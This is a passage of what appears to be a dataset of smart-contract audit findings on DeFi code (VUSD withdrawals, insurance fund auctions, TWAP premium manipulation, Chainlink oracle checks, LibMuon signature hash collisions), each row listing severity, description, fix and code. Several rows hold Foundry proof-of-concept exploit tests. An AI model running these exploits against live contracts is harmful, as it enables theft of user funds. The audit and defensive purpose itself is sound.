mintVusd(alice, amount);\\n mintVusd(bob, amount);\\n\\n // withdraw husd\\n husd.withdraw(amount); // first withdraw in the array\\n vm.prank(alice);\\n husd.withdraw(amount);\\n vm.prank(bob); // Bob is the malicious user and he wants to withdraw the VUSD to his smart contract\\n husd.withdrawTo(address(r), amount);\\n\\n assertEq(husd.withdrawalQLength(), 3);\\n assertEq(husd.start(), 0);\\n\\n husd.processWithdrawals(); // This doesn't fail on foundry because foundry's gas limit is way higher than ethereum's. 
\\n\\n uint256 ethereumSoftGasLimit = 30_000_000;\\n assertGt(r.gas(), ethereumSoftGasLimit); // You can only transfer at most 63/64 gas to an external call and the fact that the recorded amt of gas is > 30m shows that processWithdrawals will always revert when called on mainnet. \\n }\\n\\n receive() payable external {\\n assertEq(msg.sender, address(husd));\\n }\\n}\\n```\\n" +Failed withdrawals from VUSD#processWithdrawals will be lost forever,high,"When withdrawals fail inside VUSD#processWithdrawals they are permanently passed over and cannot be retried. The result is that any failed withdrawal will be lost forever.\\nVUSD.sol#L75-L81\\n```\\n (bool success, bytes memory data) = withdrawal.usr.call{value: withdrawal.amount}("""");\\n if (success) {\\n reserve -= withdrawal.amount;\\n } else {\\n emit WithdrawalFailed(withdrawal.usr, withdrawal.amount, data);\\n }\\n i += 1;\\n```\\n\\nIf the call to withdrawal.usr fails the contract will simply emit an event and continue on with its cycle. Since there is no way to retry withdrawals, these funds will be permanently lost.",Cache failed withdrawals and allow them to be retried or simply send VUSD to the user if it fails.,Withdrawals that fail will be permanently locked,"```\\n (bool success, bytes memory data) = withdrawal.usr.call{value: withdrawal.amount}("""");\\n if (success) {\\n reserve -= withdrawal.amount;\\n } else {\\n emit WithdrawalFailed(withdrawal.usr, withdrawal.amount, data);\\n }\\n i += 1;\\n```\\n" +Malicious user can frontrun withdrawals from Insurance Fund to significantly decrease value of shares,medium,"When a user withdraws from the insurance fund, the value of their shares is calculated based on the balance of vUSD in the fund. 
Another user could deliberately frontrun (or frontrun by chance) the withdrawal with a call to `settleBadDebt` to significantly reduce the vUSD returned from the withdrawal with the same number of shares.\\nWhen a user wants to `withdraw` from the insurance pool they have to go through a 2 step withdrawal process. First they need to unbond their shares, and then they have to wait for the pre-determined unbonding period before they can `withdraw` the vUSD their shares are worth by calling `withdraw`.\\nWhen a user calls `withdraw` the amount of vUSD to redeem is calculated as:\\n```\\namount = balance() * shares / totalSupply();\\n```\\n\\nwhere `balance()` is the balance of vUSD in the contract and `totalSupply()` is the total supply of share tokens. Therefore, if the balance of vUSD in the contract were to decrease, then the amount of vUSD redeemed from the same number of shares would decrease as a result.\\nThis occurs when a trader's bad debt is settled when calling `settleBadDebt` in `MarginAccount.sol` as this calls `insuranceFund.seizeBadDebt` under the hood, which in turn calls `settlePendingObligation` which transfers vUSD out of the insurance fund to the margin account:\\n```\\nvusd.safeTransfer(marginAccount, toTransfer);\\n```\\n\\nThe result is now that the balance of vUSD in the insurance fund is lower and thus the shares are worth less vUSD as a consequence.","One option would be to include a slippage parameter on the `withdraw` and `withdrawFor` methods so that the user redeeming shares can specify the minimum amount of vUSD they would accept for their shares.\\nWhen depositing into the insurance fund, the number of shares to mint is actually calculated based on the total value of the pool (value of vUSD and all other collateral assets). Therefore, the withdraw logic could also use `_totalPoolValue` instead of `balance()` to get a ""true"" value per share, however this could lead to withdrawals failing while assets are up for auction. 
Assuming all the assets are expected to be sold within the short 2 hour auction duration, this is probably the better solution given the pricing is more accurate, but it depends if users would accept failed withdrawals for short periods of time.",A user withdrawing from the insurance fund could receive significantly less (potentially 0) vUSD when finalising their withdrawal.,```\\namount = balance() * shares / totalSupply();\\n```\\n +min withdraw of 5 VUSD is not enough to prevent DOS via VUSD.sol#withdraw(amount),medium,"A vulnerability exists where a malicious user spam the contract with numerous withdrawal requests (e.g., 5,000). This would mean that genuine users who wish to withdraw their funds may find themselves unable to do so in a timely manner because the processing of their withdrawals could be delayed significantly.\\nThe issue stems from the fact that there is no restriction on the number of withdrawal requests a single address can make. A malicious actor could repeatedly call the withdraw or withdrawTo function, each time with a small amount (min 5 VUSD), to clog the queue with their withdrawal requests.\\n```\\n //E Burn vusd from msg.sender and queue the withdrawal to ""to"" address\\n function _withdrawTo(address to, uint amount) internal {\\n //E check min amount\\n require(amount >= 5 * (10 ** 6), ""min withdraw is 5 vusd""); //E @audit-info not enough to prevent grief\\n //E burn this amount from msg.sender\\n burn(amount); // burn vusd from msg.sender\\n //E push \\n withdrawals.push(Withdrawal(to, amount * 1e12));\\n }\\n```\\n\\nGiven the maxWithdrawalProcesses is set to 100, and the withdrawal processing function processWithdrawals doesn't have any parameter to process from a specific index in the queue, only the first 100 requests in the queue would be processed at a time.\\n```\\n uint public maxWithdrawalProcesses = 100;\\n //E create array of future withdrawal that will be executed to return\\n function withdrawalQueue() external view 
returns(Withdrawal[] memory queue) {\\n //E check if more than 100 requests in withdrawals array\\n uint l = _min(withdrawals.length-start, maxWithdrawalProcesses);\\n queue = new Withdrawal[](l);\\n\\n for (uint i = 0; i < l; i++) {\\n queue[i] = withdrawals[start+i];\\n }\\n }\\n```\\n\\nIn the case of an attack, the first 100 withdrawal requests could be those of the attacker, meaning that the genuine users' requests would be stuck in the queue until all of the attacker's requests have been processed. Moreover the fact that we can only withdraw up to 1 day long when our withdraw request is good to go.",Either limit number of withdrawal requests per address could be a first layer of defense even if it's not enough but I don't see the point why this limit is included so removing it could mitigate this. Otherwise you could implement a priority queue regarding amount to be withdrawn,"This could result in significant delays for genuine users wanting to withdraw their funds, undermining the contract's usability and users' trust in the platform.","```\\n //E Burn vusd from msg.sender and queue the withdrawal to ""to"" address\\n function _withdrawTo(address to, uint amount) internal {\\n //E check min amount\\n require(amount >= 5 * (10 ** 6), ""min withdraw is 5 vusd""); //E @audit-info not enough to prevent grief\\n //E burn this amount from msg.sender\\n burn(amount); // burn vusd from msg.sender\\n //E push \\n withdrawals.push(Withdrawal(to, amount * 1e12));\\n }\\n```\\n" +Malicious user can control premium emissions to steal margin from other traders,medium,"A malicious user can force premiums to be applied in a positive direction for their positions. 
They can effectively steal margin from other traders that have filled the other side of their positions.\\nThis vulnerability stems from how the premiums are calculated when `settleFunding` is called in AMM.sol:\\n```\\nint256 premium = getMarkPriceTwap() - underlyingPrice;\\n```\\n\\nEffectively, the premium for a position is calculated based on the difference between the perpetual maker TWAP and the oracle TWAP. Under the hood, `getMarkPriceTwap` calls `_calcTwap`, which calculates the TWAP price from the last hour to the current block timestamp:\\n```\\n uint256 currentPeriodStart = (_blockTimestamp() / spotPriceTwapInterval) * spotPriceTwapInterval;\\n uint256 lastPeriodStart = currentPeriodStart - spotPriceTwapInterval;\\n\\n // If there is no trade in the last period, return the last trade price\\n if (markPriceTwapData.lastTimestamp <= lastPeriodStart) {\\n return markPriceTwapData.lastPrice;\\n }\\n\\n /**\\n * check if there is any trade after currentPeriodStart\\n * since this function will not be called before the nextFundingTime,\\n * we can use the lastPeriodAccumulator to calculate the twap if there is a trade after currentPeriodStart\\n */\\n if (markPriceTwapData.lastTimestamp >= currentPeriodStart) {\\n // use the lastPeriodAccumulator to calculate the twap\\n twap = markPriceTwapData.lastPeriodAccumulator / spotPriceTwapInterval;\\n } else {\\n // use the accumulator to calculate the twap\\n uint256 currentAccumulator = markPriceTwapData.accumulator + (currentPeriodStart - markPriceTwapData.lastTimestamp) * markPriceTwapData.lastPrice;\\n twap = currentAccumulator / spotPriceTwapInterval;\\n }\\n```\\n\\nThis method works closely in conjunction with `_updateTWAP` which is called every time a new position is opened based on the fill price. I'll talk more about his in the ""Recommendation"" section, but the core issue is that too much weight is placed on the last price that was filled, along with the fact the user can open uncapped positions. 
As can be seen from the `_calcTwap` method above, if there has not been a recently opened position, then the TWAP is determined as the last filled price. And naturally, a time weighted price isn't weighted by the size of a fill as well, so the size of the last fill has no impact.\\nAs a result of this, a malicious user can place orders (which should then be executed by the validators) at a price that maximises the difference between the market TWAP and the oracle TWAP in order to maximise the premiums generated in the market. If the malicious user opens up a large enough position, the premiums generated exceed the taker/maker fees for opening positions. And since the same user can place orders for both sides of the market, they do not need to increase their margin requirement over time in order to meet the minimum margin requirements. Effectively the user is able to generate free revenue assuming the price of the underlying asset doesn't significantly deviate in the opposite direction of the large position held by the user.\\nBelow is a diff to the existing test suite with a test case that shows how a malicious user could control premiums to make a profit. 
It can be run with forge test -vvv --match-path test/foundry/OrderBook.t.sol:\\n```\\ndiff --git a/hubble-protocol/test/foundry/OrderBook.t.sol b/hubble-protocol/test/foundry/OrderBook.t.sol\\nindex b4dafdf..f5d36b2 100644\\n--- a/hubble-protocol/test/foundry/OrderBook.t.sol\\n// Add the line below\\n// Add the line below\\n// Add the line below\\n b/hubble-protocol/test/foundry/OrderBook.t.sol\\n@@ -228,6 // Add the line below\\n228,60 @@ contract OrderBookTests is Utils {\\n assertPositions(bob, -size, quote, 0, quote * 1e18 / stdMath.abs(size));\\n }\\n \\n// Add the line below\\n function testUserCanControlEmissions() public {\\n// Add the line below\\n uint256 price = 1e6;\\n// Add the line below\\n oracle.setUnderlyingPrice(address(wavax), int(uint(price)));\\n// Add the line below\\n\\n// Add the line below\\n // Calculate how much margin required for 100x MIN_SIZE\\n// Add the line below\\n uint256 marginRequired = orderBook.getRequiredMargin(100 * MIN_SIZE, price) * 1e18 / uint(defaultWethPrice) // Add the line below\\n 1e10; // required weth margin in 1e18, add 1e10 for any precision loss\\n// Add the line below\\n \\n// Add the line below\\n // Let's say Alice is our malicious user, and Bob is a normal user\\n// Add the line below\\n addMargin(alice, marginRequired, 1, address(weth));\\n// Add the line below\\n addMargin(bob, marginRequired, 1, address(weth));\\n// Add the line below\\n\\n// Add the line below\\n // Alice places a large legitimate long order that is matched with a short order from Bob\\n// Add the line below\\n placeAndExecuteOrder(0, aliceKey, bobKey, MIN_SIZE * 90, price, true, false, MIN_SIZE * 90, false);\\n// Add the line below\\n\\n// Add the line below\\n // Alice's free margin is now pretty low\\n// Add the line below\\n int256 availabeMargin = marginAccount.getAvailableMargin(alice);\\n// Add the line below\\n assertApproxEqRel(availabeMargin, 200410, 0.1e18); // Assert within 10%\\n// Add the line below\\n\\n// Add the line 
below\\n // Calculate what's the least we could fill an order for given the oracle price\\n// Add the line below\\n uint256 spreadLimit = amm.maxOracleSpreadRatio();\\n// Add the line below\\n uint minPrice = price * (1e6 - spreadLimit) / 1e6;\\n// Add the line below\\n\\n// Add the line below\\n // Alice can fill both sides of an order at the minimum fill price calculated above, with the minimum size\\n// Add the line below\\n // Alice would place such orders (and hopefully have them executed) just after anyone else makes an order in a period (1 hour)\\n// Add the line below\\n // The goal for Alice is to keep the perpetual TWAP as low as possible vs the oracle TWAP (since she holds a large long position)\\n// Add the line below\\n // In quiet market conditions Alice just has to make sure she's the last person to fill\\n// Add the line below\\n // In busy market conditions Alice would fill an order immediately after anyone else fills an order\\n// Add the line below\\n // In this test Alice fills an order every 2 periods, but in reality, if nobody was trading then Alice wouldn't have to do anything provided she was the last filler\\n// Add the line below\\n for (uint i = 0; i < 100; i// Add the line below\\n// Add the line below\\n) {\\n// Add the line below\\n uint256 currentPeriodStart = (block.timestamp / 1 hours) * 1 hours;\\n// Add the line below\\n\\n// Add the line below\\n // Warp to before the end of the period\\n// Add the line below\\n vm.warp(currentPeriodStart // Add the line below\\n 3590);\\n// Add the line below\\n \\n// Add the line below\\n // Place and execute both sides of an order as Alice\\n// Add the line below\\n // Alice can do this because once both sides of the order are executed, the effect to her free margin is 0\\n// Add the line below\\n // As mentioned above, Alice would place such orders every time after another order is executed\\n// Add the line below\\n placeAndExecuteOrder(0, aliceKey, aliceKey, MIN_SIZE, minPrice, true, false, 
MIN_SIZE, false);\\n// Add the line below\\n \\n// Add the line below\\n // Warp to the start of the next period\\n// Add the line below\\n vm.warp(currentPeriodStart // Add the line below\\n (3600 * 2) // Add the line below\\n 10);\\n// Add the line below\\n \\n// Add the line below\\n // Funding is settled. This calculates the premium emissions by comparing the perpetual twap with the oracle twap\\n// Add the line below\\n orderBook.settleFunding();\\n// Add the line below\\n }\\n// Add the line below\\n\\n// Add the line below\\n // Alice's margin is now significantly higher (after just 200 hours) because she's been pushing the premiums in her direction\\n// Add the line below\\n availabeMargin = marginAccount.getAvailableMargin(alice);\\n// Add the line below\\n assertApproxEqRel(availabeMargin, 716442910, 0.1e18); // Assert within 10%\\n// Add the line below\\n\\n// Add the line below\\n }\\n// Add the line below\\n\\n function testLiquidateAndExecuteOrder(uint64 price, uint120 size_) public {\\n vm.assume(price > 10 && size_ != 0);\\n oracle.setUnderlyingPrice(address(wavax), int(uint(price)));\\n```\\n","I originally thought the best way to mitigate this kind of attack is to scale the TWAP calculation based on the filled amount vs the total fill amount of the whole market. However the downside with this approach is that the fill amount will perpetually increase (given it's a perpetual market after all!) and so the market TWAP deviations from the oracle TWAP would decrease and so the premium emissions would also decrease over time. This could be argued as a feature in that early users receive a larger premium than later users.\\nUpon further thought I think the best way to prevent this kind of attack is simply to disincentivise the malicious user from doing so; by making this a net-loss situation. 
This can be done with a combination of the following:\\nIncreasing minimum order size\\nIncreasing trader/maker fees\\nIntroducing another fixed fee per order (rather than only variable rate fees)\\nCapping the maximum position size (both long and short)\\nReducing the maximum price deviation of fill prices from oracle price\\nIncreasing the minimum margin requirements\\nThis will vary per perpetual market, but the key thing that needs to be accomplished is that the cost to a user to place orders to control the market TWAP is greater than the premium that can be obtained from their position. This will also require some estimates as to how frequently users are going to be placing orders. If orders are relatively infrequent then increasing the TWAP calculation from 1 hour will also help with this.\\nIt is also worth considering whether the following lines in `_calcTwap` are overly weighted towards the last fill price:\\n```\\n // If there is no trade in the last period, return the last trade price\\n if (markPriceTwapData.lastTimestamp <= lastPeriodStart) {\\n return markPriceTwapData.lastPrice;\\n }\\n```\\n\\nYou could make the argument that if no trades have occurred in a significant period of time then the market TWAP should revert back to the oracle TWAP and premium emissions should halt. This could either be after one empty period, or X number of empty periods to be defined by Hubble.\\nFinally, having a trader able to hold both sides of the same perpetual in the same order makes this attack easier to implement, so it might be worth adding an extra check to prevent this. However it's worth noting the same could be achieved with 2 accounts assuming they alternated the long/short positions between them to avoid excessive margin requirements. So I'm not sure this is strictly necessary.","A user can effectively steal funds from other traders that are filling the other side of their positions. 
The larger the position the malicious user is able to fill and the longer the period, the more funds can be credited to the malicious user's margin account.",```\\nint256 premium = getMarkPriceTwap() - underlyingPrice;\\n```\\n +Malicious user can grief withdrawing users via VUSD reentrancy,medium,"VUSD#processWithdraw makes a call to withdrawal.usr to send the withdrawn gas token. processWithdrawals is the only nonreentrant function allowing a user to create a smart contract that uses it's receive function to deposit then immediately withdraw to indefinitely lengthen the withdrawal queue and waste large amounts of caller gas.\\nVUSD.sol#L69-L77\\n```\\n while (i < withdrawals.length && (i - start) < maxWithdrawalProcesses) {\\n Withdrawal memory withdrawal = withdrawals[i];\\n if (reserve < withdrawal.amount) {\\n break;\\n }\\n\\n (bool success, bytes memory data) = withdrawal.usr.call{value: withdrawal.amount}("""");\\n if (success) {\\n reserve -= withdrawal.amount;\\n```\\n\\nTo send the withdrawn gas token to the user VUSD#processWithdrawals utilizes a call with no data. When received by a contract this will trigger it's receive function. This can be abused to continually grief users who withdraw with no recurring cost to the attacker. To exploit this the attacker would withdraw VUSD to a malicious contract. This contract would deposit the received gas token then immediately withdraw it. This would lengthen the queue. Since the queue is first-in first-out a user would be forced to process all the malicious withdrawals before being able to process their own. While processing them they would inevitably reset the grief for the next user.\\nNOTE: I am submitting this as a separate issue apart from my other two similar issues. I believe it should be a separate issue because even though the outcome is similar the root cause is entirely different. 
Those are directly related to the incorrect call parameters while the root cause of this issue is that both mintWithReserve and withdraw/withdrawTo lack the reentrant modifier allowing this malicious reentrancy.",Add the nonreentrant modifier to mintWithReserve withdraw and withdrawTo,Malicious user can maliciously reenter VUSD to grief users via unnecessary gas wastage,"```\\n while (i < withdrawals.length && (i - start) < maxWithdrawalProcesses) {\\n Withdrawal memory withdrawal = withdrawals[i];\\n if (reserve < withdrawal.amount) {\\n break;\\n }\\n\\n (bool success, bytes memory data) = withdrawal.usr.call{value: withdrawal.amount}("""");\\n if (success) {\\n reserve -= withdrawal.amount;\\n```\\n"
+Malicious users can donate/leave dust amounts of collateral in contract during auctions to buy other collateral at very low prices,medium,"Auctions are only ended early if the amount of the token being auctioned drops to 0. This can be exploited via donation or leaving dust in the contract to maliciously extend the auction and buy further liquidated collateral at heavily discounted prices.\\nInsuranceFund.sol#L184-L199\\n```\\nfunction buyCollateralFromAuction(address token, uint amount) override external {\\n Auction memory auction = auctions[token];\\n // validate auction\\n require(_isAuctionOngoing(auction.startedAt, auction.expiryTime), ""IF.no_ongoing_auction"");\\n\\n // transfer funds\\n uint vusdToTransfer = _calcVusdAmountForAuction(auction, token, amount);\\n address buyer = _msgSender();\\n vusd.safeTransferFrom(buyer, address(this), vusdToTransfer);\\n IERC20(token).safeTransfer(buyer, amount); // will revert if there wasn't enough amount as requested\\n\\n // close auction if no collateral left\\n if (IERC20(token).balanceOf(address(this)) == 0) { <- @audit-issue only cancels auction if balance = 0\\n 
This can be exploited in a few ways to maliciously extend auctions and keep the timer (and price) decreasing. The first would be buy all but 1 wei of a token leaving it in the contract so the auction won't close. Since 1 wei isn't worth the gas costs to buy, there would be a negative incentive to buy the collateral, likely resulting in no on buying the final amount. A second approach would be to frontrun an buys with a single wei transfer with the same results.\\nNow that the auction has been extended any additional collateral added during the duration of the auction will start immediately well below the assets actual value. This allows malicious users to buy the asset for much cheaper, causing loss to the insurance fund.","Close the auction if there is less than a certain threshold of a token remaining after it has been bought:\\n```\\n IERC20(token).safeTransfer(buyer, amount); // will revert if there wasn't enough amount as requested\\n\\n+ uint256 minRemainingBalance = 1 * 10 ** (IERC20(token).decimal() - 3);\\n\\n // close auction if no collateral left\\n+ if (IERC20(token).balanceOf(address(this)) <= minRemainingBalance) {\\n auctions[token].startedAt = 0;\\n }\\n```\\n",Users can maliciously extend auctions and potentially get collateral for very cheap,"```\\nfunction buyCollateralFromAuction(address token, uint amount) override external {\\n Auction memory auction = auctions[token];\\n // validate auction\\n require(_isAuctionOngoing(auction.startedAt, auction.expiryTime), ""IF.no_ongoing_auction"");\\n\\n // transfer funds\\n uint vusdToTransfer = _calcVusdAmountForAuction(auction, token, amount);\\n address buyer = _msgSender();\\n vusd.safeTransferFrom(buyer, address(this), vusdToTransfer);\\n IERC20(token).safeTransfer(buyer, amount); // will revert if there wasn't enough amount as requested\\n\\n // close auction if no collateral left\\n if (IERC20(token).balanceOf(address(this)) == 0) { <- @audit-issue only cancels auction if balance = 0\\n 
auctions[token].startedAt = 0;\\n }\\n}\\n```\\n"
+MarginAccountHelper will be bricked if registry.marginAccount or insuranceFund ever change,medium,"MarginAccountHelper#syncDeps causes the contract to refresh its references to both marginAccount and insuranceFund. The issue is that approvals are never made to the new contracts rendering them useless.\\nMarginAccountHelper.sol#L82-L87\\n```\\nfunction syncDeps(address _registry) public onlyGovernance {\\n IRegistry registry = IRegistry(_registry);\\n vusd = IVUSD(registry.vusd());\\n marginAccount = IMarginAccount(registry.marginAccount());\\n insuranceFund = IInsuranceFund(registry.insuranceFund());\\n}\\n```\\n\\nWhen syncDeps is called the marginAccount and insuranceFund references are updated. All transactions require approvals to one of those two contracts. Since no new approvals are made, the contract will become bricked and all transactions will revert.",Remove approvals to old contracts before changing and approve new contracts after,Contract will become bricked and all contracts that are integrated or depend on it will also be bricked,```\\nfunction syncDeps(address _registry) public onlyGovernance {\\n IRegistry registry = IRegistry(_registry);\\n vusd = IVUSD(registry.vusd());\\n marginAccount = IMarginAccount(registry.marginAccount());\\n insuranceFund = IInsuranceFund(registry.insuranceFund());\\n}\\n```\\n
+No `minAnswer/maxAnswer` Circuit Breaker Checks while Querying Prices in Oracle.sol,medium,"The Oracle.sol contract, while currently applying a safety check (this can be side stepped, check my other submission) to ensure returned prices are greater than zero, which is commendable, as it effectively mitigates the risk of using negative prices, there should be an implementation to ensure the returned prices are not at the extreme boundaries (minAnswer and maxAnswer). 
Without such a mechanism, the contract could operate based on incorrect prices, which could lead to an over- or under-representation of the asset's value, potentially causing significant harm to the protocol.\\nChainlink aggregators have a built in circuit breaker if the price of an asset goes outside of a predetermined price band. The result is that if an asset experiences a huge drop in value (i.e. LUNA crash) the price of the oracle will continue to return the minPrice instead of the actual price of the asset. This would allow user to continue borrowing with the asset but at the wrong price. This is exactly what happened to Venus on BSC when LUNA imploded. In its current form, the `getUnderlyingPrice()` function within the Oracle.sol contract retrieves the latest round data from Chainlink, if the asset's market price plummets below `minAnswer` or skyrockets above `maxAnswer`, the returned price will still be `minAnswer` or `maxAnswer`, respectively, rather than the actual market price. 
This could potentially lead to an exploitation scenario where the protocol interacts with the asset using incorrect price information.\\nTake a look at Oracle.sol#L106-L123:\\n```\\n function getLatestRoundData(AggregatorV3Interface _aggregator)\\n internal\\n view\\n returns (\\n uint80,\\n uint256 finalPrice,\\n uint256\\n )\\n {\\n (uint80 round, int256 latestPrice, , uint256 latestTimestamp, ) = _aggregator.latestRoundData();\\n finalPrice = uint256(latestPrice);\\n if (latestPrice <= 0) {\\n requireEnoughHistory(round);\\n (round, finalPrice, latestTimestamp) = getRoundData(_aggregator, round - 1);\\n }\\n return (round, finalPrice, latestTimestamp);\\n }\\n```\\n\\nIllustration:\\nPresent price of TokenA is $10\\nTokenA has a minimum price set at $1 on chainlink\\nThe actual price of TokenA dips to $0.10\\nThe aggregator continues to report $1 as the price.\\nConsequently, users can interact with protocol using TokenA as though it were still valued at $1, which is a tenfold overestimate of its real market value.","Since there is going to be a whitelist of tokens to be added, the minPrice/maxPrice could be checked and a revert could be made when this is returned by chainlink or a fallback oracle that does not have circuit breakers could be implemented in that case",The potential for misuse arises when the actual price of an asset drastically changes but the oracle continues to operate using the `minAnswer` or `maxAnswer` as the asset's price. 
In the case of it going under the `minAnswer` malicious actors obviously have the upperhand and could give their potential going to zero worth tokens to protocol,"```\\n function getLatestRoundData(AggregatorV3Interface _aggregator)\\n internal\\n view\\n returns (\\n uint80,\\n uint256 finalPrice,\\n uint256\\n )\\n {\\n (uint80 round, int256 latestPrice, , uint256 latestTimestamp, ) = _aggregator.latestRoundData();\\n finalPrice = uint256(latestPrice);\\n if (latestPrice <= 0) {\\n requireEnoughHistory(round);\\n (round, finalPrice, latestTimestamp) = getRoundData(_aggregator, round - 1);\\n }\\n return (round, finalPrice, latestTimestamp);\\n }\\n```\\n" +setSymbolsPrice() can use the priceSig from a long time ago,high,"`setSymbolsPrice()` only restricts the maximum value of `priceSig.timestamp`, but not the minimum time This allows a malicious user to choose a malicious `priceSig` from a long time ago A malicious `priceSig.upnl` can seriously harm `partyB`\\n`setSymbolsPrice()` only restricts the maximum value of `priceSig.timestamp`, but not the minimum time\\n```\\n function setSymbolsPrice(address partyA, PriceSig memory priceSig) internal {\\n MAStorage.Layout storage maLayout = MAStorage.layout();\\n AccountStorage.Layout storage accountLayout = AccountStorage.layout();\\n LibMuon.verifyPrices(priceSig, partyA);\\n require(\\n priceSig.timestamp <=\\n maLayout.liquidationTimestamp[partyA] + maLayout.liquidationTimeout,\\n ""LiquidationFacet: Expired signature""\\n );\\n```\\n\\nLibMuon.verifyPrices only check sign, without check the time range\\n```\\n function verifyPrices(PriceSig memory priceSig, address partyA) internal view {\\n MuonStorage.Layout storage muonLayout = MuonStorage.layout();\\n require(priceSig.prices.length == priceSig.symbolIds.length, ""LibMuon: Invalid length"");\\n bytes32 hash = keccak256(\\n abi.encodePacked(\\n muonLayout.muonAppId,\\n priceSig.reqId,\\n address(this),\\n partyA,\\n priceSig.upnl,\\n 
priceSig.totalUnrealizedLoss,\\n priceSig.symbolIds,\\n priceSig.prices,\\n priceSig.timestamp,\\n getChainId()\\n )\\n );\\n verifyTSSAndGateway(hash, priceSig.sigs, priceSig.gatewaySignature);\\n }\\n```\\n\\nIn this case, a malicious user may pick any `priceSig` from a long time ago, and this `priceSig` may have a large negative `unpl`, leading to `LiquidationType.OVERDUE`, severely damaging `partyB`\\nWe need to restrict `priceSig.timestamp` to be no smaller than `maLayout.liquidationTimestamp[partyA]` to avoid this problem","restrict `priceSig.timestamp` to be no smaller than `maLayout.liquidationTimestamp[partyA]`\\n```\\n function setSymbolsPrice(address partyA, PriceSig memory priceSig) internal {\\n MAStorage.Layout storage maLayout = MAStorage.layout();\\n AccountStorage.Layout storage accountLayout = AccountStorage.layout();\\n\\n LibMuon.verifyPrices(priceSig, partyA);\\n require(maLayout.liquidationStatus[partyA], ""LiquidationFacet: PartyA is solvent"");\\n require(\\n priceSig.timestamp <=\\n maLayout.liquidationTimestamp[partyA] + maLayout.liquidationTimeout,\\n ""LiquidationFacet: Expired signature""\\n );\\n+ require(priceSig.timestamp >= maLayout.liquidationTimestamp[partyA],""invald price timestamp"");\\n```\\n",Maliciously choosing the illegal `PriceSig` thus may hurt others user,"```\\n function setSymbolsPrice(address partyA, PriceSig memory priceSig) internal {\\n MAStorage.Layout storage maLayout = MAStorage.layout();\\n AccountStorage.Layout storage accountLayout = AccountStorage.layout();\\n LibMuon.verifyPrices(priceSig, partyA);\\n require(\\n priceSig.timestamp <=\\n maLayout.liquidationTimestamp[partyA] + maLayout.liquidationTimeout,\\n ""LiquidationFacet: Expired signature""\\n );\\n```\\n" +LibMuon Signature hash collision,high,"In `LibMuon` , all signatures do not distinguish between type prefixes, and `abi.encodePacked` is used when calculating the hash Cause when `abi.encodePacked`, if there is a dynamic array, different 
structures but the same hash value may be obtained Due to conflicting hash values, signatures can be substituted for each other, making malicious use of illegal signatures possible\\nThe following two methods are examples\\n1.verifyPrices:\\n```\\n function verifyPrices(PriceSig memory priceSig, address partyA) internal view {\\n MuonStorage.Layout storage muonLayout = MuonStorage.layout();\\n require(priceSig.prices.length == priceSig.symbolIds.length, ""LibMuon: Invalid length"");\\n bytes32 hash = keccak256(\\n abi.encodePacked(\\n muonLayout.muonAppId,\\n priceSig.reqId,\\n address(this),\\n partyA,\\n priceSig.upnl,\\n priceSig.totalUnrealizedLoss,\\n priceSig.symbolIds,\\n priceSig.prices,\\n priceSig.timestamp,\\n getChainId()\\n )\\n );\\n verifyTSSAndGateway(hash, priceSig.sigs, priceSig.gatewaySignature);\\n }\\n```\\n\\n2.verifyPartyAUpnlAndPrice\\n```\\n function verifyPartyAUpnlAndPrice(\\n SingleUpnlAndPriceSig memory upnlSig,\\n address partyA,\\n uint256 symbolId\\n ) internal view {\\n MuonStorage.Layout storage muonLayout = MuonStorage.layout();\\n// require(\\n// block.timestamp <= upnlSig.timestamp + muonLayout.upnlValidTime,\\n// ""LibMuon: Expired signature""\\n// );\\n bytes32 hash = keccak256(\\n abi.encodePacked(\\n muonLayout.muonAppId,\\n upnlSig.reqId,\\n address(this),\\n partyA,\\n AccountStorage.layout().partyANonces[partyA],\\n upnlSig.upnl,\\n symbolId,\\n upnlSig.price,\\n upnlSig.timestamp,\\n getChainId()\\n )\\n );\\n verifyTSSAndGateway(hash, upnlSig.sigs, upnlSig.gatewaySignature);\\n }\\n```\\n\\nWe exclude the same common part (muonAppId/reqId/address (this)/timestamp/getChainId ())\\nThrough the following simplified test code, although the structure is different, the hash value is the same at that time\\n```\\n function test() external {\\n address verifyPrices_partyA = address(0x1);\\n int256 verifyPrices_upnl = 100;\\n int256 verifyPrices_totalUnrealizedLoss = 100;\\n uint256 [] memory verifyPrices_symbolIds = new 
uint256[](1);\\n verifyPrices_symbolIds[0]=1;\\n uint256 [] memory verifyPrices_prices = new uint256[](1);\\n verifyPrices_prices[0]=1000; \\n\\n bytes32 verifyPrices = keccak256(abi.encodePacked(\\n verifyPrices_partyA,\\n verifyPrices_upnl,\\n verifyPrices_totalUnrealizedLoss,\\n verifyPrices_symbolIds,\\n verifyPrices_prices\\n ));\\n\\n address verifyPartyAUpnlAndPrice_partyA = verifyPrices_partyA;\\n int256 verifyPartyAUpnlAndPrice_partyANonces = verifyPrices_upnl;\\n int256 verifyPartyAUpnlAndPrice_upnl = verifyPrices_totalUnrealizedLoss;\\n uint256 verifyPartyAUpnlAndPrice_symbolId = verifyPrices_symbolIds[0];\\n uint256 verifyPartyAUpnlAndPrice_price = verifyPrices_prices[0];\\n\\n\\n bytes32 verifyPartyAUpnlAndPrice = keccak256(abi.encodePacked(\\n verifyPartyAUpnlAndPrice_partyA,\\n verifyPartyAUpnlAndPrice_partyANonces,\\n verifyPartyAUpnlAndPrice_upnl,\\n verifyPartyAUpnlAndPrice_symbolId,\\n verifyPartyAUpnlAndPrice_price\\n ));\\n\\n console.log(""verifyPrices == verifyPartyAUpnlAndPrice:"",verifyPrices == verifyPartyAUpnlAndPrice);\\n\\n }\\n```\\n\\n```\\n$ forge test -vvv\\n\\nRunning 1 test for test/Counter.t.sol:CounterTest\\n[PASS] test() (gas: 4991)\\nLogs:\\n verifyPrices == verifyPartyAUpnlAndPrice: true\\n\\nTest result: ok. 
